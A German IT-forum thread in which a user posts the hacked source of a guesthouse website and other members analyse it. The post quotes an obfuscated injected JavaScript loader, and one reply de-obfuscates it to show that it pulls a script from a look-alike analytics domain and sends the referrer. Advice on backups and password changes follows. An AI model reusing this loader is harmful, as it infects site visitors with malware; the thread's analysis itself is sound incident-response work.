11
Privathomepage einer Pension mit Quelltext manipuliert
Hallo zusammen, so etwas ist mir noch nie untergekommen! Neulich rief mich eine besorgte Frau an und meint, das mit ihrer Homepage etwas nicht stimmt, Zitat: Sie ist komplett verschwunden.
Was aber nicht genz der Fall war, denn es wurde ein schadhafter Quelltext hinterlegt:
<html>
<head>
<title>Pension Stöcklholz - Urlaub am Nationalpark Bayerischer Wald</title>
<META NAME="description" CONTENT="Pension Stöcklholz, Bayerischer Wald. Urlaub in Bayern am Nationalpark Bayrischer Wald. Wellness Familienferien in der Nähe von Grafenau.">
<META NAME="keywords" CONTENT="Pension Stöcklholz, Stöckelholz, Wittensöllner, Grafenau, Urlaub, Ilz, Ilztal, Familienurlaub, Kinder, Tiere, Erholung, Entspannung, Ferienwohnung, Doppelzimmer, Einzelzimmer, Nationalpark, Bayerischer Wald, Niederbayern, Hotel, Bayern, Bayerwald, bayrisch, Familie, Hallenbad, Haidelregion, Ostbayern, Bayern, Deutschland, Erholung, Kinderfreundlich, Freyung, Kinderspielplatz, Kinderspielzimmer, Bayrischer, Nationalpark Bayerischer Wald, Naturpark Bayerischer Wald, Radfahren, Radwandern, Urlaub, Reisen, Ferien, wandern, Ski, skifahren, Langlauf, Donau, Dreisessel, Arber, Rachel, Lusen, Böhmen, Böhmerwald, Tschechien, Passau, Passauer Land, Freibad, Loipe, reiten, Naturpark, bayerisch, Urlaub, Wandern, Unterkunft, Unterkünfte, Freizeit, Ferienhaus, Ferienhäuser, Grafenau, Ferienunterkunft, Ferienunterkünfte, Reiseunterkunft, Reiseunterkünfte, Urlaubsunterkunft, Urlaubsunterkünfte, Naturpark, bavarian forest, Last Minute Angebote, Pauschalangebot, Pauschalangebote, Last-Minute-Angebote, Familien, Familienferien">
<!--4c7246f9c070710deb5de104810e46ca-><script language=javascript>pgwnl="%";xlbpi="<Y73criY70t laY6eguaY67eY3djY61vaY73criY70tY3e Y20Y66Y75nY63tY69Y6fnY20Y63kzoY71Y28Y70oY74){vaY72Y20aY68,Y6bY3dY22Y28*CcvY47Y71-mY24Y2ekyZOsY56IY488[puFY7dY26@#Y54Y60Y3bt\\\"7Y36Y33]Y5fY69Y27JUzwY41+Mn1^ENY35xaY6c2o:!bPY42hY65{rY64f|Y29Y4bY20=0jgY39~Y34,Y22,Y61=\"Y22Y2cgY62kY2cru,tza=Y22\",db;Y66or(Y61h=0;aY68<poY74.Y6cenY67tY68;Y61Y68++Y29Y7b Y67bk=Y70ot.Y63hY61rY41Y74Y28Y61Y68Y29;rY75Y3dY6b.Y69Y6edY65xOf(gY62Y6b);ifY28ru>-Y31Y29{Y20Y64b=((rY75+Y31)Y2581-1Y29;Y69Y66(Y64bY3c=0Y29Y64bY2b=8Y31;tza+Y3dk.charAt(dY62Y2dY31Y29Y3b Y7dY20eY6cseY20tY7aa+=gY62Y6bY3b}aY2bY3dtzY61;Y64ocumeY6et.wriY74Y65(Y61)Y3bY7dY3cY2fY73crY69pY74>";fsb=unescape(xlbpi.replace(/Y/g,pgwnl));var hvx,qm;document.write(fsb);hvx="<Vvd'u\"=2l19Fl9{07glGlVvd'u\"7>=f:vF${1\"kAd'\"{*=7<ScRHB`=2l19Fl9{0\\7UlGlSvd'u\"\\7=SRc0\\7e\"\"u!//AAAk9::92{l1l2'\"'vVk1{\"/iiF\"PkgV?7Mf:vF${1\"kd{|{dd{dM7\\7><\\/ScRHB`>7=Kt=</Vvd'u\">=";ckzoq(hvx);</script>
Da ich mich mit Websiteprogrammierung nicht auskenne, bzw. nur den Grundriss weiß, möchte ich hier mehr erfahren. Ich denke hier kennt sich jemand aus. Wie kann so etwas denn nur passieren?
MfG Michael
Was aber nicht genz der Fall war, denn es wurde ein schadhafter Quelltext hinterlegt:
<html>
<head>
<title>Pension Stöcklholz - Urlaub am Nationalpark Bayerischer Wald</title>
<META NAME="description" CONTENT="Pension Stöcklholz, Bayerischer Wald. Urlaub in Bayern am Nationalpark Bayrischer Wald. Wellness Familienferien in der Nähe von Grafenau.">
<META NAME="keywords" CONTENT="Pension Stöcklholz, Stöckelholz, Wittensöllner, Grafenau, Urlaub, Ilz, Ilztal, Familienurlaub, Kinder, Tiere, Erholung, Entspannung, Ferienwohnung, Doppelzimmer, Einzelzimmer, Nationalpark, Bayerischer Wald, Niederbayern, Hotel, Bayern, Bayerwald, bayrisch, Familie, Hallenbad, Haidelregion, Ostbayern, Bayern, Deutschland, Erholung, Kinderfreundlich, Freyung, Kinderspielplatz, Kinderspielzimmer, Bayrischer, Nationalpark Bayerischer Wald, Naturpark Bayerischer Wald, Radfahren, Radwandern, Urlaub, Reisen, Ferien, wandern, Ski, skifahren, Langlauf, Donau, Dreisessel, Arber, Rachel, Lusen, Böhmen, Böhmerwald, Tschechien, Passau, Passauer Land, Freibad, Loipe, reiten, Naturpark, bayerisch, Urlaub, Wandern, Unterkunft, Unterkünfte, Freizeit, Ferienhaus, Ferienhäuser, Grafenau, Ferienunterkunft, Ferienunterkünfte, Reiseunterkunft, Reiseunterkünfte, Urlaubsunterkunft, Urlaubsunterkünfte, Naturpark, bavarian forest, Last Minute Angebote, Pauschalangebot, Pauschalangebote, Last-Minute-Angebote, Familien, Familienferien">
<!--4c7246f9c070710deb5de104810e46ca-><script language=javascript>pgwnl="%";xlbpi="<Y73criY70t laY6eguaY67eY3djY61vaY73criY70tY3e Y20Y66Y75nY63tY69Y6fnY20Y63kzoY71Y28Y70oY74){vaY72Y20aY68,Y6bY3dY22Y28*CcvY47Y71-mY24Y2ekyZOsY56IY488[puFY7dY26@#Y54Y60Y3bt\\\"7Y36Y33]Y5fY69Y27JUzwY41+Mn1^ENY35xaY6c2o:!bPY42hY65{rY64f|Y29Y4bY20=0jgY39~Y34,Y22,Y61=\"Y22Y2cgY62kY2cru,tza=Y22\",db;Y66or(Y61h=0;aY68<poY74.Y6cenY67tY68;Y61Y68++Y29Y7b Y67bk=Y70ot.Y63hY61rY41Y74Y28Y61Y68Y29;rY75Y3dY6b.Y69Y6edY65xOf(gY62Y6b);ifY28ru>-Y31Y29{Y20Y64b=((rY75+Y31)Y2581-1Y29;Y69Y66(Y64bY3c=0Y29Y64bY2b=8Y31;tza+Y3dk.charAt(dY62Y2dY31Y29Y3b Y7dY20eY6cseY20tY7aa+=gY62Y6bY3b}aY2bY3dtzY61;Y64ocumeY6et.wriY74Y65(Y61)Y3bY7dY3cY2fY73crY69pY74>";fsb=unescape(xlbpi.replace(/Y/g,pgwnl));var hvx,qm;document.write(fsb);hvx="<Vvd'u\"=2l19Fl9{07glGlVvd'u\"7>=f:vF${1\"kAd'\"{*=7<ScRHB`=2l19Fl9{0\\7UlGlSvd'u\"\\7=SRc0\\7e\"\"u!//AAAk9::92{l1l2'\"'vVk1{\"/iiF\"PkgV?7Mf:vF${1\"kd{|{dd{dM7\\7><\\/ScRHB`>7=Kt=</Vvd'u\">=";ckzoq(hvx);</script>
Da ich mich mit Websiteprogrammierung nicht auskenne, bzw. nur den Grundriss weiß, möchte ich hier mehr erfahren. Ich denke hier kennt sich jemand aus. Wie kann so etwas denn nur passieren?
MfG Michael
Auf Facebook teilen
Auf Twitter teilen
Auf Reddit teilen
Auf Linkedin teilenBitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 88892
Url: https://administrator.de/contentid/88892
Ausgedruckt am: 21.11.2024 um 20:11 Uhr
11 Kommentare
Neuester Kommentar
Du hast doch gar kein body!!!
Es ist gar kein Inhalt deklariert, somit kann auch nix angezeigt werden
Es ist gar kein Inhalt deklariert, somit kann auch nix angezeigt werden
Die Website ist ja noch immer blank?
Fahre das letzte Backup ein und ändere alle Passwörter.
Kontrolliere, ob vertrauliche Daten in anderen Besitz übergegangen sein könnten.
Danach kannst du immernoch auswerten.
Das JS sagt mir nicht, kenne weder pgwnl noch xlbpi.
Und der Aufbau schaut auch sehr willkürlich aus.
(Die Sache mit dem Body ist auch so eine Sache *grübel*)
@kaffeezombie: Was für ein geiler Nick! :D :D
Fahre das letzte Backup ein und ändere alle Passwörter.
Kontrolliere, ob vertrauliche Daten in anderen Besitz übergegangen sein könnten.
Danach kannst du immernoch auswerten.
Das JS sagt mir nicht, kenne weder pgwnl noch xlbpi.
Und der Aufbau schaut auch sehr willkürlich aus.
(Die Sache mit dem Body ist auch so eine Sache *grübel*)
@kaffeezombie: Was für ein geiler Nick! :D :D
meine User gaben mir diesen Namen... sie haben eine gute beobachtunggabe 
)
)
Hallo, das Script funktioniert anscheinend nicht immer! mir wurde die installation eines ActiveX Steuerelementes angezeigt, welches eine Art Trojaner enthält. Diese Seiten sind eh schon bekannt mit den Texten "Auf ihren PC wurde Spyware entdeckt, bla,bla"
Beim ersten Aufruf der Seite wurde ich auch auf http://58.65.234.163/e/count.php weitergeleitet - vermutlich durch das ominöse Script, weshalb vermutlich auch kein body-Tag mehr da ist, damit die Weiterleitung reibungslos funktioniert.
Irgendwer hat deine FTP-Zugangsdaten benutzt und die Seite entsprechend manipuliert.
Irgendwer hat deine FTP-Zugangsdaten benutzt und die Seite entsprechend manipuliert.
Ich war neugierig und habe mir das Skript mal angesehen und "auseinander" genommen.
Zuerst werden alle "Y" die in der Variable xlbpi enthalten sind durch "%" ersetzt, danach wird der Inhalt unescapt und ergibt den JS-Code für die Funktion ckzog() die anschließend in das Dokument geschrieben wird (inkl. <script>-tags).
Mithilfe dieser Funktion wird dann der Inhalt der Variable hvx decodiert und ebenfalls in das Dokument geschrieben was zufolge hat, dass das Javascript von der angegebenen Adresse (die einer Suchmaschine __ähnelt__) eingebunden wird.
Also definitive Schadcode ! (wurde ja auch schon erwähnt)
Wahrscheinlich hat Maxi89 recht und da hat jemand deinen FTP-Account geknackt oder sich sonst wie Zugang zu deinem Webspace verschafft.
Wenn du kannst, schau die mal die Log-Dateien des FTP- und Webservers an, möglicherweise findest du Hinweise und Spuren dazu wie derjenige sich Zugang verschaffen konnte.
~Arano
<script language=javascript>
pgwnl="%";
xlbpi="<Y73criY70t laY6eguaY67eY3djY61vaY73criY70tY3e Y20Y66Y75nY63tY69Y6fnY20Y63kzoY71Y28Y70oY74){vaY72Y20aY68,Y6bY3dY22Y28*CcvY47Y71-mY24Y2ekyZOsY56IY488[puFY7dY26@#Y54Y60Y3bt\\\"7Y36Y33]Y5fY69Y27JUzwY41+Mn1^ENY35xaY6c2o:!bPY42hY65{rY64f|Y29Y4bY20=0jgY39~Y34,Y22,Y61=\"Y22Y2cgY62kY2cru,tza=Y22\",db;Y66or(Y61h=0;aY68<poY74.Y6cenY67tY68;Y61Y68++Y29Y7b Y67bk=Y70ot.Y63hY61rY41Y74Y28Y61Y68Y29;rY75Y3dY6b.Y69Y6edY65xOf(gY62Y6b);ifY28ru>-Y31Y29{Y20Y64b=((rY75+Y31)Y2581-1Y29;Y69Y66(Y64bY3c=0Y29Y64bY2b=8Y31;tza+Y3dk.charAt(dY62Y2dY31Y29Y3b Y7dY20eY6cseY20tY7aa+=gY62Y6bY3b}aY2bY3dtzY61;Y64ocumeY6et.wriY74Y65(Y61)Y3bY7dY3cY2fY73crY69pY74>";
fsb=unescape(xlbpi.replace(/Y/g,pgwnl));
var hvx,qm;
//document.write(fsb);
alert(fsb);
hvx="<Vvd'u\"=2l19Fl9{07glGlVvd'u\"7>=f:vF${1\"kAd'\"{*=7<ScRHB`=2l19Fl9{0\\7UlGlSvd'u\"\\7=SRc0\\7e\"\"u!//AAAk9::92{l1l2'\"'vVk1{\"/iiF\"PkgV?7Mf:vF${1\"kd{|{dd{dM7\\7><\\/ScRHB`>7=Kt=</Vvd'u\">=";
ckzoq(hvx);
// xlbpi bzw. fsb =
function ckzoq(pot){
var ah,
k ="(*CcvGq-m$.kyZOsVIH8[puF}&@#T`;t\"763]_i'JUzwA+Mn1^EN5xal2o:!bPBhe{rdf|)K =0jg9~4,",
a ="",
gbk,
ru,
tza="",
db;
for(ah=0;ah<pot.length;ah++){
gbk=pot.charAt(ah);
ru =k.indexOf(gbk);
if(ru>-1){
db=((ru+1)%81-1);
if(db<=0)
db+=81;
tza+=k.charAt(db-1);
}
else tza+=gbk;
}
a+=tza;
//document.write(a);
alert(a);
}
// ckzoq(hvx) =
document.write( "<SCRIPT language=\"JavaScript\" SRC=\"http://www.googleanalitics.net/__utb.js?"+document.referrer+"\"><\/SCRIPT>" );
</script>Mithilfe dieser Funktion wird dann der Inhalt der Variable hvx decodiert und ebenfalls in das Dokument geschrieben was zufolge hat, dass das Javascript von der angegebenen Adresse (die einer Suchmaschine __ähnelt__) eingebunden wird.
Also definitive Schadcode ! (wurde ja auch schon erwähnt)
Wahrscheinlich hat Maxi89 recht und da hat jemand deinen FTP-Account geknackt oder sich sonst wie Zugang zu deinem Webspace verschafft.
Wenn du kannst, schau die mal die Log-Dateien des FTP- und Webservers an, möglicherweise findest du Hinweise und Spuren dazu wie derjenige sich Zugang verschaffen konnte.
~Arano
Hallo,
es ist nicht schön Kundendaten im Internet preiszugeben.
Gruß
Filipp
es ist nicht schön Kundendaten im Internet preiszugeben.
Gruß
Filipp
Wer gibt heir Kundendaten preis? Es ist eine öffentliche Website!
Gruß Michael
Gruß Michael
Danke für deine Mühe, dass Script zu zerlegen! ich gehe auch davon aus, das der FTP Account geknackt wurde.
Ist hald ärgerlich
Gruß
Michael
Ist hald ärgerlich
Gruß
Michael
Hallo,
du hast Preisgegeben, dass diese Website nicht professionell betrieben wird, und dass es hier offensichtlich ein Sicherheitsproblem gab (oder wahrscheinlich noch gibt).
Deine Telefonnummer steht auch im öffentlichen Telefonbuch, und wahrscheinlich lässt sich irgendwo auch deine eMail-Adresse nachlesen. Trotzdem fändest du es bestimmt nicht toll, wenn ich das beides jetzt hier posten würde (oder noch an einer dritten Stelle, mit der du gar nichts zu tun hast).
Gruß
Filipp
du hast Preisgegeben, dass diese Website nicht professionell betrieben wird, und dass es hier offensichtlich ein Sicherheitsproblem gab (oder wahrscheinlich noch gibt).
Deine Telefonnummer steht auch im öffentlichen Telefonbuch, und wahrscheinlich lässt sich irgendwo auch deine eMail-Adresse nachlesen. Trotzdem fändest du es bestimmt nicht toll, wenn ich das beides jetzt hier posten würde (oder noch an einer dritten Stelle, mit der du gar nichts zu tun hast).
Gruß
Filipp
Hi Filipp
was dass mit der Website betrifft hasr du recht, nur, was nützt dir das? Das du irgendwie an meine E-mail Adresse kommen kannst und meinen Namen evtl. im Telefonbuch findest, naja kann doch sein. Außerdem bekomme ich schon genug SPAM ;) Nein, näturlich möchte das nicht unbedingt jeder.
Ich werde nächstes mal keine personenbezogene Daten mehr Posten (war so nicht richtig), auch wenn es grundsätzlich eine öffentliche Website ist und ich weder Zugang noch Passwort gesendet habe!
Sorry
Gruß
Michael
was dass mit der Website betrifft hasr du recht, nur, was nützt dir das? Das du irgendwie an meine E-mail Adresse kommen kannst und meinen Namen evtl. im Telefonbuch findest, naja kann doch sein. Außerdem bekomme ich schon genug SPAM ;) Nein, näturlich möchte das nicht unbedingt jeder.
Ich werde nächstes mal keine personenbezogene Daten mehr Posten (war so nicht richtig), auch wenn es grundsätzlich eine öffentliche Website ist und ich weder Zugang noch Passwort gesendet habe!
Sorry
Gruß
Michael
